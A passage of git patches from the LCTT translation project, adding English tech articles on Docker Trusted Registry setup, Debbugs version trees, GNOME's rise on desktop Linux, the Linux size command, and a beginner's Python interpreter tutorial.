+The DTR bootstrap image should then ask you for a couple of settings, such as the URL of your UCP installation and your UCP admin username and password. It should only take a minute or two to pull all of the DTR images and set everything up.
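+
+If you'd rather script the installation than answer prompts interactively, the bootstrapper can also accept these settings as command-line flags. The exact flag names vary between DTR releases, so (assuming the bootstrapper supports the conventional `--help` flag, which I haven't verified against every release) the safest first step is to ask it directly:
+
+```
+# List the install flags supported by your DTR bootstrapper version
+
+docker run -it --rm docker/dtr:latest install --help
+```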
+
+## Keeping Everything Secure
+
+Once everything is up and running, you're ready to push and pull images to and from the registry. Before we do that step though, let's set up our TLS certificates so that we can securely talk to DTR.
+
+On Linux, we can use these commands (just make certain you change DTR_HOSTNAME to reflect the DTR we just set up):
+
+```
+# Pull the CA certificate from DTR (you can use wget if curl is unavailable)
+
+# Set this to the hostname of the DTR instance you just installed
+DTR_HOSTNAME=
+
+curl -k https://$DTR_HOSTNAME/ca > $DTR_HOSTNAME.crt
+
+sudo mkdir -p /etc/docker/certs.d/$DTR_HOSTNAME
+
+sudo cp $DTR_HOSTNAME.crt /etc/docker/certs.d/$DTR_HOSTNAME/
+
+# Restart the docker daemon (use `sudo service docker restart` on Ubuntu 14.04)
+
+sudo systemctl restart docker
+```
+
+On Docker for Mac and Windows, we'll set up our client a little bit differently. Go in to Settings -> Daemon and in the Insecure Registries section, enter in your DTR hostname. Click Apply, and your docker daemon should restart and you should be good to go.
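+
+Under the hood, that setting roughly amounts to adding your DTR hostname to the Docker daemon's `insecure-registries` list. If you manage the daemon configuration by hand instead, the equivalent daemon.json fragment looks something like the sketch below; `dtr.example.com` is a placeholder for your DTR hostname, and the TLS-certificate approach shown above remains the preferable option:
+
+```
+{
+  "insecure-registries": ["dtr.example.com"]
+}
+```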
+
+## Pushing and Pulling Images
+
+We now need to set up a repository to hold an image. This is a little bit different from Docker Hub, which automatically creates a repository if one doesn't exist when you do a docker push. To create the repository, point your browser to `https://<DTR_HOSTNAME>` and sign in with your admin credentials when prompted. If you added a license to UCP, that license will automatically have been picked up by DTR. If not, make certain you upload your license now.
+
+Once you're in, click on the `New Repository` button and create a new repository.
+
+We'll create a repo to hold Alpine Linux, so type `alpine` in the name field, and click `Save` (it's labelled `Create` in DTR 2.5 and newer).
+
+Now let's go back to our shell and type the commands:
+
+```
+# Pull the latest version of Alpine Linux
+
+docker pull alpine:latest
+
+# Sign in to your new DTR instance
+
+docker login $DTR_HOSTNAME
+
+# Tag Alpine to be able to push it to your DTR
+
+docker tag alpine:latest $DTR_HOSTNAME/admin/alpine:latest
+
+# Push the image to DTR
+
+docker push $DTR_HOSTNAME/admin/alpine:latest
+```
+
+And that's it! We just pulled a copy of the latest Alpine Linux, re-tagged it so that we could store it inside of DTR, and then pushed it to our private registry. If you want to pull that image to a different Docker engine, set up your DTR certs as shown above, and issue the command:
+
+```
+# Pull the image from DTR
+
+docker pull $DTR_HOSTNAME/admin/alpine:latest
+```
+
+DTR has a lot of great image management features built right in, such as image caching, mirroring, scanning, signing, and even automated supply chain policies. We'll leave these for future blog posts, where we can explore them in more detail.
+
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://blog.docker.com/2018/01/dtr/
+
+作者:[Patrick Devine;Rolf Neugebauer;Docker Core Engineering;Matt Bentley][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://blog.docker.com/author/pdevine/
+[1]:https://i1.wp.com/blog.docker.com/wp-content/uploads/ccd278d2-29c2-4866-8285-c2fe60b4bd5e-1.jpg?resize=965%2C452&ssl=1
+[2]:https://hub.docker.com/
+[3]:https://blog.docker.com/2016/08/securing-enterprise-software-supply-chain-using-docker/
+[4]:https://www.docker.com/trial
+[5]:https://store.docker.com/search?offering=enterprise&page=1&q=&type=edition
From a026e583d57491b7188a19148ffc89e834246810 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 19:38:27 +0800
Subject: [PATCH 247/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Debbugs=20Version?=
=?UTF-8?q?ing:=20Merging?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../20180108 Debbugs Versioning- Merging.md | 80 +++++++++++++++++++
1 file changed, 80 insertions(+)
create mode 100644 sources/tech/20180108 Debbugs Versioning- Merging.md
diff --git a/sources/tech/20180108 Debbugs Versioning- Merging.md b/sources/tech/20180108 Debbugs Versioning- Merging.md
new file mode 100644
index 0000000000..ea479acc75
--- /dev/null
+++ b/sources/tech/20180108 Debbugs Versioning- Merging.md
@@ -0,0 +1,80 @@
+Debbugs Versioning: Merging
+======
+One of the key features of Debbugs, the [bug tracking system Debian uses][1], is its ability to figure out which bugs apply to which versions of a package by tracking package uploads. This system generally works well, but when a package maintainer's workflow doesn't match the assumptions of Debbugs, unexpected things can happen. In this post, I'm going to:
+
+ 1. introduce how Debbugs tracks versions
+ 2. provide an example of a merge-based workflow which Debbugs doesn't handle well
+ 3. provide some suggestions on what to do in this case
+
+
+
+### Debbugs Versioning
+
+Debbugs tracks versions using a set of one or more [rooted trees][2] which it builds from the ordering of debian/changelog entries. In the simplest case, every upload of a Debian package has changelog entries in the same order, and each upload adds just one version. For example, in the case of [dgit][3], to start with the package has this (abridged) version tree:
+
+![][4]
+
+the next upload, 3.13, has a changelog with this version ordering: `3.13 3.12 3.11 3.10`, which causes the 3.13 version to be added as a descendant of 3.12, and the version tree now looks like this:
+
+![][5]
+
+dgit is being developed while also being used, so new versions with potentially disruptive changes are uploaded to experimental while production versions are uploaded to unstable. For example, the 4.0 experimental upload was based on the 3.10 version, with the changelog ordering `4.0 3.10`. The tree now has two branches, but everything seems as you would expect:
+
+![][6]
+
+### Merge based workflows
+
+Bugfixes made in the maintenance version of dgit are also brought into the experimental package by merging changes from the production version using git. In this case, some changes which were present in the 3.12 and 3.11 versions are merged using git, which corresponds to a git merge flow like this:
+
+![][7]
+
+If an upload is prepared with changelog ordering `4.1 4.0 3.12 3.11 3.10`, Debbugs combines this new changelog ordering with the previously known tree, to produce this version tree:
+
+![][8]
+
+This looks a bit odd; what happened? Debbugs walks through the new changelog, connecting each of the new versions to the previous version if and only if that version is not already an ancestor of the new version. Because the changelog says that 3.12 is the ancestor of 4.0, that's where the `4.1 4.0` version tree is connected.
+
+Now, when 4.2 is uploaded, it has the changelog ordering (based on time) `4.2 3.13 4.1 4.0 3.12 3.11 3.10`, which corresponds to this git merge flow:
+
+![][9]
+
+Debbugs adds in 3.13 as an ancestor of 4.2, and because 4.1 was not an ancestor of 3.13 in the previous tree, 4.1 is added as an ancestor of 3.13. This results in the following graph:
+
+![][10]
+
+Which doesn't seem particularly helpful, because
+
+![][11]
+
+is probably the tree that more closely resembles reality.
+
+### Suggestions on what to do
+
+Why does this even matter? Bugs which are found in 3.11, and fixed in 3.12 now show up as being found in 4.0 after the 4.1 release, though they weren't found in 4.0 before that release. It also means that 3.13 now shows up as having all of the bugs fixed in 4.2, which might not be what is meant.
+
+To avoid this, my suggestion is to order the entries in changelogs in the same order that the version graph should be traversed from the leaf version you are releasing to the root. So if the previous version tree is what is wanted, 3.13 should have a changelog with ordering `3.13 3.12 3.11 3.10`, and 4.2 should have a changelog with ordering `4.2 4.1 4.0 3.10`.
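+
+To make that concrete, here is a sketch (mine, not from the original post) of how the entry headers in the 4.2 upload's debian/changelog would be ordered under this suggestion; the entry bodies are omitted and the distributions and urgency values are invented for illustration:
+
+```
+dgit (4.2) experimental; urgency=medium
+  ...
+dgit (4.1) experimental; urgency=medium
+  ...
+dgit (4.0) experimental; urgency=medium
+  ...
+dgit (3.10) unstable; urgency=medium
+  ...
+```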
+
+What about making the BTS support DAGs which are not trees? I think something like this would be useful, but I don't personally have a good idea on how this could be specified using the changelog or how bug fixed/found/absent should be propagated in the DAG. If you have better ideas, email me!
+
+--------------------------------------------------------------------------------
+
+via: https://www.donarmstrong.com/posts/debbugs_merge_versions/
+
+作者:[Don Armstrong][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.donarmstrong.com/
+[1]:https://bugs.debian.org
+[2]:https://en.wikipedia.org/wiki/Tree_%28graph_theory%29#Forest
+[3]:https://packages.debian.org/dgit
+[4]:https://www.donarmstrong.com/graph-5d3f559f0fb850f47a5ea54c62b96da18bba46b8.png
+[5]:https://www.donarmstrong.com/graph-04a0cac92e522aa8816397090f0a23ef51e49379.png
+[6]:https://www.donarmstrong.com/graph-65493d1d56cbf3a32fc6e061d4d933f609d0dd9d.png
+[7]:https://www.donarmstrong.com/graph-cc7df2f6e47656a87ca10d313e65a8e3d55fb937.png
+[8]:https://www.donarmstrong.com/graph-94b259ce6dd4d28c04d692c72f6e021622b5b33a.png
+[9]:https://www.donarmstrong.com/graph-72f98ac7aa28e7dd40aaccf7742359f5dd2de378.png
+[10]:https://www.donarmstrong.com/graph-70ebe94be503db5ba97c4693f9e00fbb1dc3c9f7.png
+[11]:https://www.donarmstrong.com/graph-3f8db089ab21b48bcae9d536c1887b3bc6fc4bcb.png
From c7b455b6288b1e4a8fa2863f3f6fb711886a83a7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 19:45:07 +0800
Subject: [PATCH 248/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20You=20GNOME=20it:?=
=?UTF-8?q?=20Windows=20and=20Apple=20devs=20get=20a=20compelling=20reason?=
=?UTF-8?q?=20to=20turn=20to=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...et a compelling reason to turn to Linux.md | 70 +++++++++++++++++++
1 file changed, 70 insertions(+)
create mode 100644 sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
diff --git a/sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md b/sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
new file mode 100644
index 0000000000..ed7e2650ce
--- /dev/null
+++ b/sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
@@ -0,0 +1,70 @@
+You GNOME it: Windows and Apple devs get a compelling reason to turn to Linux
+======
+
+![](https://regmedia.co.uk/2018/01/05/shutterstock_penguins_celebrate.jpg?x=442&y=293&crop=1)
+
+**Open Source Insider** The biggest open source story of 2017 was unquestionably Canonical's decision to stop developing its Unity desktop and move Ubuntu to the GNOME Shell desktop.
+
+What made the story that much more entertaining was how well Canonical pulled off the transition. [Ubuntu 17.10][1] was quite simply one of the best releases of the year and certainly the best release Ubuntu has put out in a good long time. Of course, since 17.10 was not an LTS release, the more conservative users - who may well be the majority in Ubuntu's case - still haven't made the transition.
+
+![Woman takes a hammer to laptop][2]
+
+Ubuntu 17.10 pulled: Linux OS knackers laptop BIOSes, Intel kernel driver fingered
+
+Canonical pulled Ubuntu 17.10 downloads from its website last month due to a "bug" that could corrupt BIOS settings on some laptops. Lenovo laptops appear to be the most common source of problems, though users also reported problems with Acer and Dell.
+
+The bug is actually a result of Canonical's decision to enable the Intel SPI driver, which allows BIOS firmware updates. That sounds nice, but it's not ready for prime time. Clearly. It's also clearly labeled as such and disabled in the upstream kernel. For whatever reason Canonical enabled it and, as it says on the tin, the results were unpredictable.
+
+According to chatter on the Ubuntu mailing list, a fix is a few days away, with testing happening now. In the meantime, if you've been affected (for what it's worth, I have a Lenovo laptop and was *not* affected), OMGUbuntu has some [instructions that might possibly help][4].
+
+It's a shame it happened because the BIOS issue seriously mars what was an otherwise fabulous release of Ubuntu.
+
+Meanwhile, the repercussions of Canonical's move to GNOME are still being felt in the open source world and I believe this will continue to be one of the biggest stories in 2018 for several reasons. The first is that so many have yet to actually make the move to GNOME-based Ubuntu. That will change with 18.04, which is an LTS release set to arrive later this year. Users upgrading between LTS releases will get their first taste of Ubuntu with GNOME come April.
+
+### You got to have standards: Suddenly it's much, much more accessible
+
+The second, and perhaps much bigger, reason Ubuntu without Unity will continue to be a big story in the foreseeable future is that with Ubuntu using GNOME Shell, almost all the major distributions out there now ship primarily with GNOME, making GNOME Shell the de facto standard Linux desktop. That's not to say GNOME is the only option, but for a new user, landing on the Ubuntu downloads webpage or the Fedora download page or the Debian download page, the default links will get you GNOME Shell on the desktop.
+
+That makes it possible for Linux and open source advocates to make a more appealing case for the platform. That kind of ubiquity is something GNOME hasn't enjoyed previously. And it may not be good news for KDE fans, but I believe it's going to have a profound impact on the future of desktop Linux and open source development more generally, because it dovetails nicely with something that I believe has been a huge story in 2017 and will continue to be a huge story in 2018 - Flatpak/Snap packages.
+
+Combine a de facto standard desktop with a standard means of packaging applications and you have a platform that's just as easy to develop for as any other, say Windows or macOS.
+
+The development tools in GNOME, particularly the APIs and GNOME Builder tool that arrived earlier this year with GNOME 3.20, offer developers a standardised means of targeting the Linux desktop in a way that simply hasn't been possible until now. Combine that with the ability to package applications _independent of distro_ and you have a much more compelling platform for developers.
+
+That just might mean that developers not currently targeting Linux will be willing to take another look.
+
+Now this potential utopia has some downsides. As already noted, it leaves KDE fans a little out in the cold. It also leaves my favourite distro looking a little less necessary than it used to. I won't be abandoning Arch Linux any time soon, but I'll have a much harder time making a solid case for Arch once Flatpak/Snap packages have more or less eliminated the need for the Arch User Repository. That's not going to happen overnight, but I do think it will eventually get there.
+
+### What to look forward to...
+
+There are two other big stories to watch in 2018. The first is Amazon Linux 2, Amazon's new home-grown Linux distro, based - loosely it seems - on RHEL 7. While Amazon Linux 2 screams vendor lock-in to me, it will certainly appeal to the millions of companies already heavily invested in the AWS system.
+
+It also appears, from my limited testing, to offer some advantages over other images on EC2. One is speed: AL2 has been tuned to the AWS environment, but perhaps the bigger advantage is the uniformity and ease of moving from development to production entirely through identical containers.
+
+![Still from Mr Robot][5]
+
+ Mozilla's creepy Mr Robot stunt in Firefox flops in touching tribute to TV show's 2nd season
+
+The last story worth keeping an eye on is Firefox. The once, and possibly future, darling of open source development had something of a rough year. Firefox 57 with the Quantum code re-write was perhaps the most impressive release since Firefox 1.0, but that was followed up by the rather disastrous Mr Robot tie-in promo fiasco that installed unwanted plugins in users' browsers, an egregious breach of trust that would have made even Chrome developers blush.
+
+I think there are going to be a lot more of these sorts of gaffes in 2018. Hopefully not involving Firefox, but as open source projects struggle to find different ways to fund themselves and attain higher levels of recognition, we should expect there to be plenty of ill-advised stunts of this sort.
+
+I'd say pop some popcorn, because the harder that open source projects try to find money, the more sparks - and disgruntled users - are going to fly. ®
+
+--------------------------------------------------------------------------------
+
+via: https://www.theregister.co.uk/2018/01/08/desktop_linux_open_source_standards_accessible/
+
+作者:[Scott Gilbertson][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:
+[1]:https://www.theregister.co.uk/2017/10/20/ubuntu_1710/
+[2]:https://regmedia.co.uk/2017/12/14/shutterstock_laptop_hit.jpg?x=174&y=115&crop=1
+[3]:https://www.theregister.co.uk/2017/12/21/ubuntu_lenovo_bios/
+[4]:http://www.omgubuntu.co.uk/2018/01/ubuntu-17-10-lenovo-fix
+[5]:https://regmedia.co.uk/2017/12/18/mr_robot_still.jpg?x=174&y=115&crop=1
+[6]:https://www.theregister.co.uk/2017/12/18/mozilla_mr_robot_firefox_promotion/
From 6b15e9bf1fa04f28955bb0a109eac7cd02a99799 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 19:45:49 +0800
Subject: [PATCH 249/371] add done: 20180108 You GNOME it- Windows and Apple
devs get a compelling reason to turn to Linux.md
---
...ows and Apple devs get a compelling reason to turn to Linux.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename sources/{tech => talk}/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md (100%)
diff --git a/sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md b/sources/talk/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
similarity index 100%
rename from sources/tech/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
rename to sources/talk/20180108 You GNOME it- Windows and Apple devs get a compelling reason to turn to Linux.md
From 6e06d7710ca595975610729aebe7762b3ae1cf05 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 19:53:21 +0800
Subject: [PATCH 250/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20size=20Co?=
=?UTF-8?q?mmand=20Tutorial=20for=20Beginners=20(6=20Examples)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...and Tutorial for Beginners (6 Examples).md | 143 ++++++++++++++++++
1 file changed, 143 insertions(+)
create mode 100644 sources/tech/20180109 Linux size Command Tutorial for Beginners (6 Examples).md
diff --git a/sources/tech/20180109 Linux size Command Tutorial for Beginners (6 Examples).md b/sources/tech/20180109 Linux size Command Tutorial for Beginners (6 Examples).md
new file mode 100644
index 0000000000..4467e442c5
--- /dev/null
+++ b/sources/tech/20180109 Linux size Command Tutorial for Beginners (6 Examples).md
@@ -0,0 +1,143 @@
+translating by lujun9972
+Linux size Command Tutorial for Beginners (6 Examples)
+======
+
+As some of you might already know, an object or executable file in Linux consists of several sections (like text and data). In case you want to know the size of each section, there exists a command line utility - dubbed **size** \- that provides you with this information. In this tutorial, we will discuss the basics of this tool using some easy-to-understand examples.
+
+But before we do that, it's worth mentioning that all the examples in this article have been tested on Ubuntu 16.04 LTS.
+
+## Linux size command
+
+The size command basically lists section sizes as well as total size for the input object file(s). Here's the syntax for the command:
+```
+size [-A|-B|--format=compatibility]
+ [--help]
+ [-d|-o|-x|--radix=number]
+ [--common]
+ [-t|--totals]
+ [--target=bfdname] [-V|--version]
+ [objfile...]
+```
+
+And here's how the man page describes this utility:
+```
+The GNU size utility lists the section sizes---and the total size---for each of the object or archive files objfile in its argument list. By default, one line of output is generated for each object file or each module in an archive.
+
+objfile... are the object files to be examined. If none are specified, the file "a.out" will be used.
+```
+
+Following are some Q&A-styled examples that'll give you a better idea about how the size command works.
+
+## Q1. How to use size command?
+
+Basic usage of size is very simple. All you have to do is to pass the object/executable file name as input to the tool. Following is an example:
+
+```
+size apl
+```
+
+Following is the output the above command produced on our system:
+
+[![How to use size command][1]][2]
+
+The first three entries are for text, data, and bss sections, with their corresponding sizes. Then comes the total in decimal and hexadecimal formats. And finally, the last entry is for the filename.
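+
+In case the screenshot doesn't render for you, the default (Berkeley-style) output has the following general shape; the numbers below are invented purely for illustration:
+
+```
+   text    data     bss     dec     hex filename
+ 124563    4768    4424  133755   20a7b apl
+```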
+
+## Q2. How to switch between different output formats?
+
+The default output format, the man page for size says, is similar to the Berkeley format. However, if you want, you can go for the System V convention as well. For this, you'll have to use the **\--format** option with SysV as its value.
+
+```
+size apl --format=SysV
+```
+
+Here's the output in this case:
+
+[![How to switch between different output formats][3]][4]
+
+## Q3. How to switch between different size units?
+
+By default, the size of sections is displayed in decimal. However, if you want, you can have this information in octal as well as hexadecimal. For this, use the **-o** and **-x** command line options, respectively.
+
+[![How to switch between different size units][5]][6]
+
+Here's what the man page says about these options:
+```
+-d
+-o
+-x
+--radix=number
+
+Using one of these options, you can control whether the size of each section is given in decimal
+(-d, or --radix=10); octal (-o, or --radix=8); or hexadecimal (-x, or --radix=16). In
+--radix=number, only the three values (8, 10, 16) are supported. The total size is always given in
+two radices; decimal and hexadecimal for -d or -x output, or octal and hexadecimal if you're using
+-o.
+```
+
+## Q4. How to make size command show totals of all object files?
+
+If you are using size to find out section sizes for multiple files in one go, you can also have the tool print the totals of all column values. You can enable this feature using the **-t** command line option.
+
+```
+size -t [file1] [file2] ...
+```
+
+The following screenshot shows this command line option in action:
+
+[![How to make size command show totals of all object files][7]][8]
+
+The last row in the output has been added by the **-t** command line option.
+
+## Q5. How to make size print total size of common symbols in each file?
+
+If you are running the size command with multiple input files and want it to display the total size of the common symbols in each file, you can do this with the **\--common** command line option.
+
+```
+size --common [file1] [file2] ...
+```
+
+It's also worth mentioning that when using Berkeley format these are included in the bss size.
+
+## Q6. What are the other available command line options?
+
+Aside from the ones discussed so far, size also offers some generic command line options like **-v** (for version info) and **-h** (for a summary of eligible arguments and options).
+
+[![What are the other available command line options][9]][10]
+
+In addition, you can also make size read command-line options from a file. You can do this using the **@file** option. Following are some details related to this option:
+```
+The options read are inserted in place of the original @file option. If file does not exist, or
+ cannot be read, then the option will be treated literally, and not removed. Options in file are
+separated by whitespace. A whitespace character may be included in an option by surrounding the
+entire option in either single or double quotes. Any character (including a backslash) may be
+included by prefixing the character to be included with a backslash. The file may itself contain
+additional @file options; any such options will be processed recursively.
+```
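+
+As a quick illustration (the file name `opts.txt` below is just an example, not something the tool requires), you could collect frequently used options in a file and reference it on the command line:
+
+```
+# Put commonly used options into a file...
+echo "-t -x" > opts.txt
+
+# ...then let size expand them in place of the @file argument
+size @opts.txt [file1] [file2]
+```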
+
+## Conclusion
+
+One thing is clear: the size command isn't for everybody. It's aimed only at those who deal with the structure of object/executable files in Linux. So if you are among the target audience, practice the options we've discussed here, and you should be ready to use the tool on a daily basis. For more information on size, head to its [man page][11].
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-size-command/
+
+作者:[Himanshu Arora][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/command-tutorial/size-basic-usage.png
+[2]:https://www.howtoforge.com/images/command-tutorial/big/size-basic-usage.png
+[3]:https://www.howtoforge.com/images/command-tutorial/size-format-option.png
+[4]:https://www.howtoforge.com/images/command-tutorial/big/size-format-option.png
+[5]:https://www.howtoforge.com/images/command-tutorial/size-o-x-options.png
+[6]:https://www.howtoforge.com/images/command-tutorial/big/size-o-x-options.png
+[7]:https://www.howtoforge.com/images/command-tutorial/size-t-option.png
+[8]:https://www.howtoforge.com/images/command-tutorial/big/size-t-option.png
+[9]:https://www.howtoforge.com/images/command-tutorial/size-v-x1.png
+[10]:https://www.howtoforge.com/images/command-tutorial/big/size-v-x1.png
+[11]:https://linux.die.net/man/1/size
From 3405e48d33c1472a1813d381d0ef2875fe6f4366 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 20:01:33 +0800
Subject: [PATCH 251/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Let=E2=80=99s=20B?=
=?UTF-8?q?uild=20A=20Simple=20Interpreter.=20Part=201.?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...t-s Build A Simple Interpreter. Part 1..md | 341 ++++++++++++++++++
1 file changed, 341 insertions(+)
create mode 100644 sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
diff --git a/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md b/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
new file mode 100644
index 0000000000..4c0d541a5a
--- /dev/null
+++ b/sources/tech/20150615 Let-s Build A Simple Interpreter. Part 1..md
@@ -0,0 +1,341 @@
+Let’s Build A Simple Interpreter. Part 1.
+======
+
+
+> **" If you don't know how compilers work, then you don't know how computers work. If you're not 100% sure whether you know how compilers work, then you don't know how they work."** -- Steve Yegge
+
+There you have it. Think about it. It doesn't really matter whether you're a newbie or a seasoned software developer: if you don't know how compilers and interpreters work, then you don't know how computers work. It's that simple.
+
+So, do you know how compilers and interpreters work? And I mean, are you 100% sure that you know how they work? If you don't. ![][1]
+
+Or if you don't and you're really agitated about it. ![][2]
+
+Do not worry. If you stick around and work through the series and build an interpreter and a compiler with me you will know how they work in the end. And you will become a confident happy camper too. At least I hope so. ![][3]
+
+Why would you study interpreters and compilers? I will give you three reasons.
+
+ 1. To write an interpreter or a compiler you have to have a lot of technical skills that you need to use together. Writing an interpreter or a compiler will help you improve those skills and become a better software developer. As well, the skills you will learn are useful in writing any software, not just interpreters or compilers.
+ 2. You really want to know how computers work. Often interpreters and compilers look like magic. And you shouldn't be comfortable with that magic. You want to demystify the process of building an interpreter and a compiler, understand how they work, and get in control of things.
+ 3. You want to create your own programming language or domain specific language. If you create one, you will also need to create either an interpreter or a compiler for it. Recently, there has been a resurgence of interest in new programming languages. And you can see a new programming language pop up almost every day: Elixir, Go, Rust just to name a few.
+
+
+
+
+Okay, but what are interpreters and compilers?
+
+The goal of an **interpreter** or a **compiler** is to translate a source program in some high-level language into some other form. Pretty vague, isn't it? Just bear with me, later in the series you will learn exactly what the source program is translated into.
+
+At this point you may also wonder what the difference is between an interpreter and a compiler. For the purpose of this series, let's agree that if a translator translates a source program into machine language, it is a **compiler**. If a translator processes and executes the source program without translating it into machine language first, it is an **interpreter**. Visually it looks something like this:
+
+![][4]
+
+I hope that by now you're convinced that you really want to study and build an interpreter and a compiler. What can you expect from this series on interpreters?
+
+Here is the deal. You and I are going to create a simple interpreter for a large subset of [Pascal][5] language. At the end of this series you will have a working Pascal interpreter and a source-level debugger like Python's [pdb][6].
+
+You might ask, why Pascal? For one thing, it's not a made-up language that I came up with just for this series: it's a real programming language that has many important language constructs. And some old, but useful, CS books use Pascal programming language in their examples (I understand that that's not a particularly compelling reason to choose a language to build an interpreter for, but I thought it would be nice for a change to learn a non-mainstream language :)
+
+Here is an example of a factorial function in Pascal that you will be able to interpret with your own interpreter and debug with the interactive source-level debugger that you will create along the way:
+```
+program factorial;
+
+function factorial(n: integer): longint;
+begin
+ if n = 0 then
+ factorial := 1
+ else
+ factorial := n * factorial(n - 1);
+end;
+
+var
+ n: integer;
+
+begin
+ for n := 0 to 16 do
+ writeln(n, '! = ', factorial(n));
+end.
+```
+
+The implementation language of the Pascal interpreter will be Python, but you can use any language you want because the ideas presented don't depend on any particular implementation language. Okay, let's get down to business. Ready, set, go!
+
+You will start your first foray into interpreters and compilers by writing a simple interpreter of arithmetic expressions, also known as a calculator. Today the goal is pretty minimalistic: to make your calculator handle the addition of two single digit integers like **3+5**. Here is the source code for your calculator, sorry, interpreter:
+
+```
+# Token types
+#
+# EOF (end-of-file) token is used to indicate that
+# there is no more input left for lexical analysis
+INTEGER, PLUS, EOF = 'INTEGER', 'PLUS', 'EOF'
+
+
+class Token(object):
+ def __init__(self, type, value):
+ # token type: INTEGER, PLUS, or EOF
+ self.type = type
+        # token value: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, '+', or None
+ self.value = value
+
+ def __str__(self):
+ """String representation of the class instance.
+
+ Examples:
+ Token(INTEGER, 3)
+ Token(PLUS '+')
+ """
+ return 'Token({type}, {value})'.format(
+ type=self.type,
+ value=repr(self.value)
+ )
+
+ def __repr__(self):
+ return self.__str__()
+
+
+class Interpreter(object):
+ def __init__(self, text):
+ # client string input, e.g. "3+5"
+ self.text = text
+ # self.pos is an index into self.text
+ self.pos = 0
+ # current token instance
+ self.current_token = None
+
+ def error(self):
+ raise Exception('Error parsing input')
+
+ def get_next_token(self):
+ """Lexical analyzer (also known as scanner or tokenizer)
+
+ This method is responsible for breaking a sentence
+ apart into tokens. One token at a time.
+ """
+ text = self.text
+
+ # is self.pos index past the end of the self.text ?
+ # if so, then return EOF token because there is no more
+ # input left to convert into tokens
+ if self.pos > len(text) - 1:
+ return Token(EOF, None)
+
+ # get a character at the position self.pos and decide
+ # what token to create based on the single character
+ current_char = text[self.pos]
+
+ # if the character is a digit then convert it to
+ # integer, create an INTEGER token, increment self.pos
+ # index to point to the next character after the digit,
+ # and return the INTEGER token
+ if current_char.isdigit():
+ token = Token(INTEGER, int(current_char))
+ self.pos += 1
+ return token
+
+ if current_char == '+':
+ token = Token(PLUS, current_char)
+ self.pos += 1
+ return token
+
+ self.error()
+
+ def eat(self, token_type):
+ # compare the current token type with the passed token
+ # type and if they match then "eat" the current token
+ # and assign the next token to the self.current_token,
+ # otherwise raise an exception.
+ if self.current_token.type == token_type:
+ self.current_token = self.get_next_token()
+ else:
+ self.error()
+
+ def expr(self):
+ """expr -> INTEGER PLUS INTEGER"""
+ # set current token to the first token taken from the input
+ self.current_token = self.get_next_token()
+
+ # we expect the current token to be a single-digit integer
+ left = self.current_token
+ self.eat(INTEGER)
+
+ # we expect the current token to be a '+' token
+ op = self.current_token
+ self.eat(PLUS)
+
+ # we expect the current token to be a single-digit integer
+ right = self.current_token
+ self.eat(INTEGER)
+ # after the above call the self.current_token is set to
+ # EOF token
+
+ # at this point INTEGER PLUS INTEGER sequence of tokens
+ # has been successfully found and the method can just
+ # return the result of adding two integers, thus
+ # effectively interpreting client input
+ result = left.value + right.value
+ return result
+
+
+def main():
+ while True:
+ try:
+ # To run under Python3 replace 'raw_input' call
+ # with 'input'
+ text = raw_input('calc> ')
+ except EOFError:
+ break
+ if not text:
+ continue
+ interpreter = Interpreter(text)
+ result = interpreter.expr()
+ print(result)
+
+
+if __name__ == '__main__':
+ main()
+```
+
+
+Save the above code into a file named calc1.py, or download it directly from [GitHub][7]. Before you start digging deeper into the code, run the calculator on the command line and see it in action. Play with it! Here is a sample session on my laptop (if you want to run the calculator under Python3 you will need to replace raw_input with input):
+```
+$ python calc1.py
+calc> 3+4
+7
+calc> 3+5
+8
+calc> 3+9
+12
+calc>
+```
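+
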